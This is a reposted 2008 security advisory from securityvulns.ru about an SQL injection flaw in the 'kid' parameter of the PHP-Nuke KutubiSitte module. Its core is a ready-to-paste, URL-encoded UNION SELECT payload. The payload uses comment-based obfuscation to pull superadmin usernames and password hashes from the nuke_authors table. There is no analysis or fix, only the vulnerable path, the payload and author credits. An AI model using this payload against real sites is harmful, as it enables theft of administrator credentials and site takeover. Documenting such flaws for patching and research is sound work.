Computer Security

Security Advisory: PHP-Nuke KutubiSitte "kid" SQL Injection
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  WoltLab Burning Board Lite 2 Beta 1 Thread Delete CSRF Vulnerability

  Alkacon OpenCms logfileViewSettings.
jsp XSS, file disclosure

  PHP-Nuke KutubiSitte "kid"  SQL Injection exploit code adding

  Horde Webmail file inclusion proof of concept & patch.

From:lovebug_(at)_hotmail.it <lovebug_(at)_hotmail.it>
Date:09.03.2008
Subject:PHP-Nuke KutubiSitte "kid" SQL Injection


RBT-4 Crew

rbt-4.net



PHP-Nuke KutubiSitte "kid"  SQL Injection

http://www.rbt-4.net/forum/viewthread.php?forum_id=51&thread_id=3058

AUTHOR : Lovebug



# modules.php?name=KutubiSitte&h_op=hadisgoster&kid=

Exploit :

-
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2
A%2A%2F0%2C0,aid,pwd,
4%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%
2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2
A


Lovebug, r080cy90r, ThE_RaV[3]N, Dir31, The_Stooge
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server